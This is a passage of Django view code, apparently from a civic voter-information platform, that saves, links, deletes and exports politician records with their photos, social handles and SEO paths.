messages.add_message(request, messages.ERROR,\n 'POLITICIAN_ERROR Please click the back arrow and report URL to the engineering team ')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) + url_variables)\n\n push_seo_friendly_path_changes = False\n try:\n if existing_politician_found:\n messages.add_message(request, messages.ERROR, 'This politician already exists.')\n return HttpResponseRedirect(reverse('politician:politician_new', args=()) + url_variables)\n elif politician_on_stage_found:\n # Update below\n pass\n else:\n # Create new\n required_politician_variables = True \\\n if positive_value_exists(politician_name) \\\n else False\n if required_politician_variables:\n politician_on_stage = Politician(\n first_name=extract_first_name_from_full_name(politician_name),\n middle_name=extract_middle_name_from_full_name(politician_name),\n last_name=extract_last_name_from_full_name(politician_name),\n politician_name=politician_name,\n state_code=state_code,\n )\n politician_on_stage_found = True\n if politician_on_stage_found:\n # #################################################\n # Process incoming uploaded photo if there is one\n politician_photo_in_binary_format = None\n politician_photo_converted_to_binary = False\n if politician_photo_file_found:\n try:\n politician_photo_in_binary_format = b64encode(politician_photo_file.read()).decode('utf-8')\n politician_photo_converted_to_binary = True\n except Exception as e:\n messages.add_message(request, messages.ERROR,\n \"Error converting politician photo to binary: {error}\".format(error=e))\n if politician_photo_file_found and politician_photo_converted_to_binary:\n photo_results = politician_save_photo_from_file_reader(\n politician_we_vote_id=politician_we_vote_id,\n politician_photo_binary_file=politician_photo_in_binary_format)\n if photo_results['we_vote_hosted_politician_photo_original_url']:\n we_vote_hosted_politician_photo_original_url = \\\n photo_results['we_vote_hosted_politician_photo_original_url']\n # Now we want to resize to a large version\n create_resized_image_results = create_resized_images(\n politician_we_vote_id=politician_we_vote_id,\n politician_uploaded_profile_image_url_https=we_vote_hosted_politician_photo_original_url)\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_large = \\\n create_resized_image_results['cached_resized_image_url_large']\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_medium = \\\n create_resized_image_results['cached_resized_image_url_medium']\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_tiny = \\\n create_resized_image_results['cached_resized_image_url_tiny']\n if profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UNKNOWN \\\n or profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UPLOADED:\n politician_on_stage.profile_image_type_currently_active = PROFILE_IMAGE_TYPE_UPLOADED\n politician_on_stage.we_vote_hosted_profile_image_url_large = \\\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_large\n politician_on_stage.we_vote_hosted_profile_image_url_medium = \\\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_medium\n politician_on_stage.we_vote_hosted_profile_image_url_tiny = \\\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_tiny\n elif profile_image_type_currently_active is not False:\n politician_on_stage.profile_image_type_currently_active = profile_image_type_currently_active\n elif politician_photo_file_delete:\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_large = None\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_medium = None\n politician_on_stage.we_vote_hosted_profile_uploaded_image_url_tiny = None\n if profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UPLOADED \\\n or profile_image_type_currently_active == PROFILE_IMAGE_TYPE_UNKNOWN:\n politician_on_stage.profile_image_type_currently_active = PROFILE_IMAGE_TYPE_UNKNOWN\n politician_on_stage.we_vote_hosted_profile_image_url_large = None\n politician_on_stage.we_vote_hosted_profile_image_url_medium = None\n politician_on_stage.we_vote_hosted_profile_image_url_tiny = None\n elif profile_image_type_currently_active is not False:\n from image.controllers import organize_object_photo_fields_based_on_image_type_currently_active\n results = organize_object_photo_fields_based_on_image_type_currently_active(\n object_with_photo_fields=politician_on_stage,\n profile_image_type_currently_active=profile_image_type_currently_active,\n )\n if results['success']:\n politician_on_stage = results['object_with_photo_fields']\n\n # ###############################################\n # Now process all other politician fields\n if ballot_guide_official_statement is not False:\n politician_on_stage.ballot_guide_official_statement = ballot_guide_official_statement\n if ballotpedia_politician_name is not False:\n politician_on_stage.ballotpedia_politician_name = ballotpedia_politician_name\n if ballotpedia_politician_url is not False:\n politician_on_stage.ballotpedia_politician_url = ballotpedia_politician_url\n try:\n if birth_date is not False:\n if birth_date == '':\n politician_on_stage.birth_date = None\n else:\n politician_on_stage.birth_date = datetime.strptime(birth_date, '%b. %d, %Y')\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not save birthdate:' + str(e))\n if facebook_url is not False:\n politician_on_stage.facebook_url = facebook_url\n if facebook_url2 is not False:\n politician_on_stage.facebook_url2 = facebook_url2\n if facebook_url3 is not False:\n politician_on_stage.facebook_url3 = facebook_url3\n if first_name is not False:\n politician_on_stage.first_name = first_name\n if middle_name is not False:\n politician_on_stage.middle_name = middle_name\n if last_name is not False:\n politician_on_stage.last_name = last_name\n if gender is not False:\n gender = gender[0]\n if politician_on_stage.gender != gender:\n politician_on_stage.gender_likelihood = POLITICAL_DATA_MANAGER\n if gender == 'U':\n politician_on_stage.gender_likelihood = ''\n politician_on_stage.gender = gender\n if google_civic_candidate_name is not False:\n politician_on_stage.google_civic_candidate_name = google_civic_candidate_name\n if google_civic_candidate_name2 is not False:\n politician_on_stage.google_civic_candidate_name2 = google_civic_candidate_name2\n if google_civic_candidate_name3 is not False:\n politician_on_stage.google_civic_candidate_name3 = google_civic_candidate_name3\n if instagram_handle is not False:\n politician_on_stage.instagram_handle = instagram_handle\n is_battleground_years_list = IS_BATTLEGROUND_YEARS_AVAILABLE\n years_false_list = []\n years_true_list = []\n for year in is_battleground_years_list:\n is_battleground_race_key = 'is_battleground_race_' + str(year)\n incoming_is_battleground_race = positive_value_exists(request.POST.get(is_battleground_race_key, False))\n if hasattr(politician_on_stage, is_battleground_race_key):\n if incoming_is_battleground_race:\n years_true_list.append(year)\n else:\n years_false_list.append(year)\n setattr(politician_on_stage, is_battleground_race_key, incoming_is_battleground_race)\n years_list = list(set(years_false_list + years_true_list))\n if linkedin_url is not False:\n politician_on_stage.linkedin_url = linkedin_url\n if maplight_id is not False:\n politician_on_stage.maplight_id = maplight_id\n if politician_contact_form_url is not False:\n politician_on_stage.politician_contact_form_url = politician_contact_form_url\n if politician_email is not False:\n politician_on_stage.politician_email = politician_email\n if politician_email2 is not False:\n politician_on_stage.politician_email2 = politician_email2\n if politician_email3 is not False:\n politician_on_stage.politician_email3 = politician_email3\n if politician_name is not False:\n politician_on_stage.politician_name = politician_name\n if politician_phone_number is not False:\n politician_on_stage.politician_phone_number = politician_phone_number\n if politician_phone_number2 is not False:\n politician_on_stage.politician_phone_number2 = politician_phone_number2\n if politician_phone_number3 is not False:\n politician_on_stage.politician_phone_number3 = politician_phone_number3\n # Reset all politician_twitter_handles\n politician_on_stage.politician_twitter_handle = None\n politician_on_stage.politician_twitter_handle2 = None\n politician_on_stage.politician_twitter_handle3 = None\n politician_on_stage.politician_twitter_handle4 = None\n politician_on_stage.politician_twitter_handle5 = None\n if politician_twitter_handle is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle2 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle2)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle3 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle3)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle4 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle4)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_twitter_handle5 is not False:\n add_results = add_twitter_handle_to_next_politician_spot(\n politician_on_stage, politician_twitter_handle5)\n if add_results['success']:\n politician_on_stage = add_results['politician']\n if politician_url is not False:\n politician_on_stage.politician_url = politician_url\n if politician_url2 is not False:\n politician_on_stage.politician_url2 = politician_url2\n if politician_url3 is not False:\n politician_on_stage.politician_url3 = politician_url3\n if politician_url4 is not False:\n politician_on_stage.politician_url4 = politician_url4\n if politician_url5 is not False:\n politician_on_stage.politician_url5 = politician_url5\n if political_party is not False:\n political_party = convert_to_political_party_constant(political_party)\n politician_on_stage.political_party = political_party\n if state_code is not False:\n politician_on_stage.state_code = state_code\n if seo_friendly_path is not False:\n # If path isn't passed in, create one. If provided, verify it is unique.\n seo_results = politician_manager.generate_seo_friendly_path(\n base_pathname_string=seo_friendly_path,\n politician_name=politician_on_stage.politician_name,\n politician_we_vote_id=politician_on_stage.we_vote_id,\n state_code=politician_on_stage.state_code)\n if seo_results['success']:\n seo_friendly_path = seo_results['seo_friendly_path']\n if not positive_value_exists(seo_friendly_path):\n seo_friendly_path = None\n if seo_friendly_path != politician_on_stage.seo_friendly_path:\n # Update linked candidate & representative entries to use this latest seo_friendly_path\n push_seo_friendly_path_changes = True\n politician_on_stage.seo_friendly_path = seo_friendly_path\n\n politician_on_stage.twitter_handle_updates_failing = twitter_handle_updates_failing\n politician_on_stage.twitter_handle2_updates_failing = twitter_handle2_updates_failing\n if vote_smart_id is not False:\n politician_on_stage.vote_smart_id = vote_smart_id\n if politician_we_vote_id is not False:\n politician_on_stage.we_vote_id = politician_we_vote_id\n if vote_usa_politician_id is not False:\n politician_on_stage.vote_usa_politician_id = vote_usa_politician_id\n if wikipedia_url is not False:\n politician_on_stage.wikipedia_url = wikipedia_url\n if youtube_url is not False:\n politician_on_stage.youtube_url = youtube_url\n\n politician_on_stage.save()\n politician_we_vote_id = politician_on_stage.we_vote_id\n vote_usa_politician_id = politician_on_stage.vote_usa_politician_id\n politician_id = politician_on_stage.id\n\n # Now generate_seo_friendly_path if there isn't one\n seo_results = politician_manager.generate_seo_friendly_path(\n base_pathname_string=politician_on_stage.seo_friendly_path,\n politician_name=politician_on_stage.politician_name,\n politician_we_vote_id=politician_on_stage.we_vote_id,\n state_code=politician_on_stage.state_code)\n if seo_results['success']:\n seo_friendly_path = seo_results['seo_friendly_path']\n if positive_value_exists(seo_friendly_path):\n politician_on_stage.seo_friendly_path = seo_friendly_path\n politician_on_stage.save()\n messages.add_message(request, messages.INFO, 'Politician saved.')\n\n if positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n from campaign.controllers import update_campaignx_from_politician\n campaignx_manager = CampaignXManager()\n campaignx_results = campaignx_manager.retrieve_campaignx(\n campaignx_we_vote_id=politician_on_stage.linked_campaignx_we_vote_id)\n if campaignx_results['campaignx_found']:\n campaignx = campaignx_results['campaignx']\n results = update_campaignx_from_politician(campaignx=campaignx, politician=politician_on_stage)\n if results['success']:\n campaignx = results['campaignx']\n campaignx.date_last_updated_from_politician = localtime(now()).date()\n campaignx.save()\n # Find current representative for this politician\n representative_manager = RepresentativeManager()\n rep_results = representative_manager.retrieve_representative(\n politician_we_vote_id=politician_on_stage.we_vote_id)\n if rep_results['representative_found']:\n from representative.controllers import update_representative_details_from_politician\n representative = rep_results['representative']\n results = update_representative_details_from_politician(\n representative=representative,\n politician=politician_on_stage)\n if results['success']:\n if results['save_changes']:\n representative = results['representative']\n representative.date_last_updated_from_politician = localtime(now()).date()\n representative.save()\n else:\n # messages.add_message(request, messages.INFO, 'Could not save -- missing required variables.')\n if positive_value_exists(politician_id):\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)) +\n url_variables)\n else:\n return HttpResponseRedirect(reverse('politician:politician_new', args=()) +\n url_variables)\n\n except Exception as e:\n handle_record_not_saved_exception(e, logger=logger)\n messages.add_message(request, messages.ERROR, \"Could not save politician. Error:\" + str(e))\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n\n if positive_value_exists(politician_we_vote_id) and len(years_list) > 0:\n from politician.controllers import update_parallel_fields_with_years_in_related_objects\n results = update_parallel_fields_with_years_in_related_objects(\n field_key_root='is_battleground_race_',\n master_we_vote_id_updated=politician_we_vote_id,\n years_false_list=years_false_list,\n years_true_list=years_true_list,\n )\n if not results['success']:\n status += results['status']\n status += \"FAILED_TO_UPDATE_PARALLEL_FIELDS_FROM_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n\n position_list_manager = PositionListManager()\n # ##################################\n # Unlink Candidates from this Politician if \"unlink_candidate_XXXXX_from_politician\" passed in\n try:\n linked_candidate_query = CandidateCampaign.objects.all()\n linked_candidate_query = linked_candidate_query.filter(\n Q(politician_we_vote_id__iexact=politician_on_stage.we_vote_id) |\n Q(politician_id=politician_on_stage.id)\n )\n linked_candidate_list = list(linked_candidate_query)\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'LINKED_CANDIDATE_PROBLEM: ' + str(e))\n linked_candidate_list = []\n for candidate in linked_candidate_list:\n if positive_value_exists(candidate.id):\n variable_name = \"unlink_candidate_\" + str(candidate.id) + \"_from_politician\"\n unlink_candidate = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(unlink_candidate) and positive_value_exists(politician_we_vote_id):\n candidate.politician_we_vote_id = None\n candidate.politician_id = None\n candidate.seo_friendly_path = None\n candidate.save()\n # Now update positions\n results = position_list_manager.update_politician_we_vote_id_in_all_positions(\n candidate_we_vote_id=candidate.we_vote_id,\n new_politician_id=None,\n new_politician_we_vote_id=None)\n\n messages.add_message(request, messages.INFO,\n 'Candidate unlinked, number of positions changed: {number_changed}'\n ''.format(number_changed=results['number_changed']))\n else:\n pass\n\n # ##################################\n # Unlink Representatives from this Politician if \"unlink_representative_XXXXX_from_politician\" passed in\n try:\n linked_representative_query = Representative.objects.all()\n linked_representative_query = linked_representative_query.filter(\n Q(politician_we_vote_id__iexact=politician_on_stage.we_vote_id) |\n Q(politician_id=politician_on_stage.id)\n )\n linked_representative_list = list(linked_representative_query)\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'LINKED_REPRESENTATIVE_PROBLEM: ' + str(e))\n linked_representative_list = []\n for representative in linked_representative_list:\n if positive_value_exists(representative.id):\n variable_name = \"unlink_representative_\" + str(representative.id) + \"_from_politician\"\n unlink_representative = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(unlink_representative) and positive_value_exists(politician_we_vote_id):\n representative.politician_we_vote_id = None\n representative.politician_id = None\n representative.seo_friendly_path = None\n representative.save()\n\n messages.add_message(request, messages.INFO, 'Representative unlinked.')\n else:\n pass\n\n # ##################################\n # Find Candidates to Link to this Politician\n # Finding Candidates that *might* be \"children\" of this politician\n from politician.controllers import find_candidates_to_link_to_this_politician\n\n related_candidate_list = find_candidates_to_link_to_this_politician(politician=politician_on_stage)\n\n # ##################################\n # Link Candidates to this Politician\n for candidate in related_candidate_list:\n if positive_value_exists(candidate.id):\n variable_name = \"link_candidate_\" + str(candidate.id) + \"_to_politician\"\n link_candidate = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(link_candidate) and positive_value_exists(politician_we_vote_id):\n candidate.politician_id = politician_id\n candidate.politician_we_vote_id = politician_we_vote_id\n candidate.seo_friendly_path = politician_on_stage.seo_friendly_path\n if not positive_value_exists(candidate.vote_usa_politician_id) and \\\n positive_value_exists(vote_usa_politician_id):\n candidate.vote_usa_politician_id = vote_usa_politician_id\n candidate.save()\n # Now update positions\n results = position_list_manager.update_politician_we_vote_id_in_all_positions(\n candidate_we_vote_id=candidate.we_vote_id,\n new_politician_id=politician_id,\n new_politician_we_vote_id=politician_we_vote_id)\n\n messages.add_message(request, messages.INFO,\n 'Candidate linked, number of positions changed: {number_changed}'\n ''.format(number_changed=results['number_changed']))\n else:\n pass\n\n # ##################################\n # Find Representatives to Link to this Politician\n # Finding Representatives that *might* be \"children\" of this politician\n from politician.controllers import find_representatives_to_link_to_this_politician\n related_representative_list = find_representatives_to_link_to_this_politician(politician=politician_on_stage)\n\n # ##################################\n # Link Representatives to this Politician\n for representative in related_representative_list:\n if positive_value_exists(representative.id):\n variable_name = \"link_representative_\" + str(representative.id) + \"_to_politician\"\n link_representative = positive_value_exists(request.POST.get(variable_name, False))\n if positive_value_exists(link_representative) and positive_value_exists(politician_we_vote_id):\n representative.politician_id = politician_id\n representative.politician_we_vote_id = politician_we_vote_id\n representative.seo_friendly_path = politician_on_stage.seo_friendly_path\n if not positive_value_exists(representative.vote_usa_politician_id) and \\\n positive_value_exists(vote_usa_politician_id):\n representative.vote_usa_politician_id = vote_usa_politician_id\n representative.save()\n\n # Update Linked CampaignXs with seo_friendly_path\n if success and positive_value_exists(politician_on_stage.we_vote_id) and \\\n positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n heal_linked_campaignx_variables = True\n campaignx_manager = CampaignXManager()\n campaignx_results = campaignx_manager.retrieve_campaignx(\n campaignx_we_vote_id=politician_on_stage.linked_campaignx_we_vote_id,\n )\n if not campaignx_results['success']:\n status += campaignx_results['status']\n status += \"FAILED_TO_RETRIEVE_CAMPAIGNX_LINKED_TO_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n elif campaignx_results['campaignx_found']:\n campaignx = campaignx_results['campaignx']\n value_changed = False\n if positive_value_exists(campaignx.linked_politician_we_vote_id) \\\n and campaignx.linked_politician_we_vote_id != politician_on_stage.we_vote_id:\n heal_linked_campaignx_variables = False\n if heal_linked_campaignx_variables and positive_value_exists(politician_on_stage.seo_friendly_path) \\\n and campaignx.seo_friendly_path != politician_on_stage.seo_friendly_path:\n # Consider saving politician_on_stage.seo_friendly_path into CampaignXSEOFriendlyPath,\n # so we can maintain connection to this campaignx if the politician_on_stage.seo_friendly_path changes\n # The problem with doing that, is that when we relegate this campaignx to the past, we will have\n # a politician-generated seo_friendly_path linked to a former campaignx, causing a collision.\n # When we unlink campaigns by removing linked_politician_we_vote_id from CampaignX, we will want to\n # generate a new seo_friendly_path for that historical campaignx.\n campaignx.seo_friendly_path = politician_on_stage.seo_friendly_path\n value_changed = True\n messages.add_message(request, messages.INFO, \"Campaignx updated with seo_friendly_path.\")\n if heal_linked_campaignx_variables and not positive_value_exists(campaignx.linked_politician_we_vote_id):\n campaignx.linked_politician_we_vote_id = politician_on_stage.we_vote_id\n value_changed = True\n messages.add_message(request, messages.INFO, \"Campaignx updated with linked_politician_we_vote_id.\")\n if not heal_linked_campaignx_variables:\n messages.add_message(request, messages.ERROR, \"Cannot heal Campaignx linked variables.\")\n\n if value_changed:\n campaignx.save()\n\n # Update Linked Candidates with seo_friendly_path, and\n if success and positive_value_exists(politician_we_vote_id):\n candidate_list_manager = CandidateListManager()\n politician_we_vote_id_list = [politician_we_vote_id]\n candidate_results = candidate_list_manager.retrieve_candidate_list(\n politician_we_vote_id_list=politician_we_vote_id_list,\n )\n if not candidate_results['success']:\n status += candidate_results['status']\n status += \"FAILED_TO_RETRIEVE_CANDIDATES_LINKED_TO_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n update_list = []\n updates_needed = False\n updates_made = 0\n candidates_to_update_from_politician = []\n if candidate_results['candidate_list_found']:\n now_as_we_vote_date_string = convert_date_to_we_vote_date_string(now())\n now_as_integer = convert_we_vote_date_string_to_date_as_integer(now_as_we_vote_date_string)\n candidate_list = candidate_results['candidate_list']\n for candidate in candidate_list:\n if positive_value_exists(candidate.candidate_ultimate_election_date) \\\n and candidate.candidate_ultimate_election_date > now_as_integer:\n candidates_to_update_from_politician.append(candidate)\n elif positive_value_exists(politician_on_stage.seo_friendly_path) and push_seo_friendly_path_changes:\n candidate.seo_friendly_path = politician_on_stage.seo_friendly_path\n update_list.append(candidate)\n updates_needed = True\n updates_made += 1\n if updates_needed:\n CandidateCampaign.objects.bulk_update(update_list, ['seo_friendly_path'])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} candidates updated with new seo_friendly_path.\"\n \"\".format(updates_made=updates_made))\n if len(candidates_to_update_from_politician) > 0:\n from candidate.controllers import update_candidate_details_from_politician\n for candidate in candidates_to_update_from_politician:\n results = update_candidate_details_from_politician(candidate=candidate, politician=politician_on_stage)\n if results['success'] and results['save_changes']:\n candidate_to_update = results['candidate']\n candidate_to_update.save()\n else:\n status += results['status']\n\n # Update Linked Representatives with seo_friendly_path\n if success and positive_value_exists(politician_on_stage.seo_friendly_path) and push_seo_friendly_path_changes:\n representative_manager = RepresentativeManager()\n politician_we_vote_id_list = [politician_we_vote_id]\n representative_results = representative_manager.retrieve_representative_list(\n politician_we_vote_id_list=politician_we_vote_id_list,\n )\n if not representative_results['success']:\n status += representative_results['status']\n status += \"FAILED_TO_RETRIEVE_REPRESENTATIVES_LINKED_TO_POLITICIAN \"\n messages.add_message(request, messages.ERROR, status)\n update_list = []\n updates_needed = False\n updates_made = 0\n if representative_results['representative_list_found']:\n representative_list = representative_results['representative_list']\n for representative in representative_list:\n representative.seo_friendly_path = politician_on_stage.seo_friendly_path\n update_list.append(representative)\n updates_needed = True\n updates_made += 1\n if updates_needed:\n Representative.objects.bulk_update(update_list, ['seo_friendly_path'])\n messages.add_message(request, messages.INFO,\n \"{updates_made:,} representatives updated with new seo_friendly_path.\"\n \"\".format(updates_made=updates_made))\n\n # Update Linked CampaignX with seo_friendly_path (Only if hard-linked)\n if success and positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id) \\\n and positive_value_exists(politician_on_stage.seo_friendly_path) and push_seo_friendly_path_changes:\n # TODO Implement this\n pass\n\n # ####################################################################\n # To make sure we have the freshest data, update supporters_count on all objects\n if positive_value_exists(politician_on_stage.linked_campaignx_we_vote_id):\n from campaign.controllers import create_campaignx_supporters_from_positions, \\\n refresh_campaignx_supporters_count_in_all_children\n campaignx_we_vote_id_list_to_refresh = [politician_on_stage.linked_campaignx_we_vote_id]\n politician_we_vote_id_list = [politician_on_stage.we_vote_id]\n # #############################\n # Create campaignx_supporters\n create_from_friends_only_positions = False\n results = create_campaignx_supporters_from_positions(\n request,\n friends_only_positions=False,\n politician_we_vote_id_list=politician_we_vote_id_list)\n campaignx_we_vote_id_list_changed = results['campaignx_we_vote_id_list_to_refresh']\n if len(campaignx_we_vote_id_list_changed) > 0:\n campaignx_we_vote_id_list_to_refresh = \\\n list(set(campaignx_we_vote_id_list_changed + campaignx_we_vote_id_list_to_refresh))\n if not positive_value_exists(results['campaignx_supporter_entries_created']):\n create_from_friends_only_positions = True\n if create_from_friends_only_positions:\n results = create_campaignx_supporters_from_positions(\n request,\n friends_only_positions=True,\n politician_we_vote_id_list=politician_we_vote_id_list)\n campaignx_we_vote_id_list_changed = results['campaignx_we_vote_id_list_to_refresh']\n if len(campaignx_we_vote_id_list_changed) > 0:\n campaignx_we_vote_id_list_to_refresh = \\\n list(set(campaignx_we_vote_id_list_changed + campaignx_we_vote_id_list_to_refresh))\n\n campaignx_manager = CampaignXManager()\n supporter_count = campaignx_manager.fetch_campaignx_supporter_count(\n politician_on_stage.linked_campaignx_we_vote_id)\n results = campaignx_manager.retrieve_campaignx(\n campaignx_we_vote_id=politician_on_stage.linked_campaignx_we_vote_id)\n if results['campaignx_found']:\n campaignx = results['campaignx']\n campaignx.supporters_count = supporter_count\n campaignx.save()\n\n results = refresh_campaignx_supporters_count_in_all_children(\n request,\n campaignx_we_vote_id_list=campaignx_we_vote_id_list_to_refresh)\n if positive_value_exists(results['update_message']):\n update_message += results['update_message']\n\n if positive_value_exists(update_message):\n messages.add_message(request, messages.INFO, update_message)\n\n if politician_id:\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n else:\n return HttpResponseRedirect(reverse('politician:politician_new', args=()))\n\n\n@login_required\ndef politician_retrieve_photos_view(request, candidate_id): # TODO DALE Transition fully to politician\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'admin'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n candidate_id = convert_to_int(candidate_id)\n force_retrieve = request.GET.get('force_retrieve', 0)\n\n candidate_manager = CandidateManager()\n\n results = candidate_manager.retrieve_candidate_from_id(candidate_id)\n if not positive_value_exists(results['candidate_found']):\n messages.add_message(request, messages.ERROR,\n \"Candidate '{candidate_id}' not found.\".format(candidate_id=candidate_id))\n return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))\n\n we_vote_candidate = results['candidate']\n\n display_messages = True\n retrieve_candidate_results = retrieve_candidate_photos(we_vote_candidate, force_retrieve)\n\n if retrieve_candidate_results['status'] and display_messages:\n messages.add_message(request, messages.INFO, retrieve_candidate_results['status'])\n return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))\n\n\n@login_required\ndef politician_delete_process_view(request):\n \"\"\"\n Delete this politician\n :param request:\n :return:\n \"\"\"\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n politician_id = convert_to_int(request.GET.get('politician_id', 0))\n\n # Retrieve this politician\n politician_we_vote_id = ''\n politician_on_stage_found = False\n politician_on_stage = None\n if positive_value_exists(politician_id):\n try:\n politician_query = Politician.objects.filter(id=politician_id)\n if len(politician_query):\n politician_on_stage = politician_query[0]\n politician_we_vote_id = politician_on_stage.we_vote_id\n politician_on_stage_found = True\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not find politician -- exception: ', str(e))\n\n if not politician_on_stage_found:\n messages.add_message(request, messages.ERROR, 'Could not find politician.')\n return HttpResponseRedirect(reverse('politician:politician_list', args=()))\n\n # Are there any positions attached to this politician that should be moved to another instance of this politician?\n if positive_value_exists(politician_id) or positive_value_exists(politician_we_vote_id):\n position_list_manager = PositionListManager()\n candidate_list_manager = CandidateListManager()\n # By not passing in new values, we remove politician_id and politician_we_vote_id\n results = position_list_manager.update_politician_we_vote_id_in_all_positions(\n politician_id=politician_id,\n politician_we_vote_id=politician_we_vote_id)\n results = candidate_list_manager.update_politician_we_vote_id_in_all_candidates(\n politician_id=politician_id,\n politician_we_vote_id=politician_we_vote_id)\n\n try:\n # Delete the politician\n politician_on_stage.delete()\n messages.add_message(request, messages.INFO, 'Politician deleted.')\n except Exception as e:\n messages.add_message(request, messages.ERROR, 'Could not delete politician -- exception: ' + str(e))\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n\n return HttpResponseRedirect(reverse('politician:politician_list', args=()))\n\n\n# This page does not need to be protected.\ndef politicians_sync_out_view(request): # politiciansSyncOut\n status = \"\"\n state_code = request.GET.get('state_code', '')\n politician_search = request.GET.get('politician_search', '')\n\n try:\n politician_query = Politician.objects.using('readonly').all()\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n filters = []\n if positive_value_exists(politician_search):\n new_filter = Q(politician_name__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle2__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle3__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle4__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_twitter_handle5__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url2__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url3__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url4__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(politician_url5__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(party__icontains=politician_search)\n filters.append(new_filter)\n\n new_filter = Q(we_vote_id__iexact=politician_search)\n filters.append(new_filter)\n\n # Add the first query\n if len(filters):\n final_filters = filters.pop()\n\n # ...and \"OR\" the remaining items in the list\n for item in filters:\n final_filters |= item\n\n politician_query = politician_query.filter(final_filters)\n\n politician_query = politician_query.values(\n 'we_vote_id',\n 'ballotpedia_id',\n 'ballotpedia_politician_name',\n 'ballotpedia_politician_url',\n 'bioguide_id',\n 'birth_date',\n 'cspan_id',\n 'ctcl_uuid',\n 'date_last_updated',\n 'date_last_updated_from_candidate',\n 'facebook_url',\n 'facebook_url2',\n 'facebook_url3',\n 'facebook_url_is_broken',\n 'facebook_url2_is_broken',\n 'facebook_url3_is_broken',\n 'fec_id',\n 'first_name',\n 'full_name_assembled',\n 'gender',\n 'google_civic_candidate_name',\n 'google_civic_candidate_name2',\n 'google_civic_candidate_name3',\n 'govtrack_id',\n 'house_history_id',\n 'icpsr_id',\n 'instagram_followers_count',\n 'instagram_handle',\n 'is_battleground_race_2019',\n 'is_battleground_race_2020',\n 'is_battleground_race_2021',\n 'is_battleground_race_2022',\n 'is_battleground_race_2023',\n 'is_battleground_race_2024',\n 'is_battleground_race_2025',\n 'is_battleground_race_2026',\n 'last_name',\n 'linked_campaignx_we_vote_id',\n 'linkedin_url',\n 'lis_id',\n 'maplight_id',\n 'middle_name',\n 'opensecrets_id',\n 'political_party',\n 'politician_contact_form_url',\n 'politician_email_address',\n 'politician_email',\n 'politician_email2',\n 'politician_email3',\n 'politician_facebook_id',\n 'politician_googleplus_id',\n 'politician_name',\n 'politician_phone_number',\n 'politician_phone_number2',\n 'politician_phone_number3',\n 'politician_twitter_handle',\n 'politician_twitter_handle2',\n 'politician_twitter_handle3',\n 'politician_twitter_handle4',\n 'politician_twitter_handle5',\n 'politician_url',\n 'politician_url2',\n 'politician_url3',\n 'politician_url4',\n 'politician_url5',\n 'politician_youtube_id',\n 'profile_image_type_currently_active',\n 'seo_friendly_path',\n 'seo_friendly_path_date_last_updated',\n 'state_code',\n 'thomas_id',\n 'twitter_description',\n 'twitter_followers_count',\n 'twitter_handle_updates_failing',\n 'twitter_handle2_updates_failing',\n 'twitter_location',\n 'twitter_name',\n 'twitter_profile_image_url_https',\n 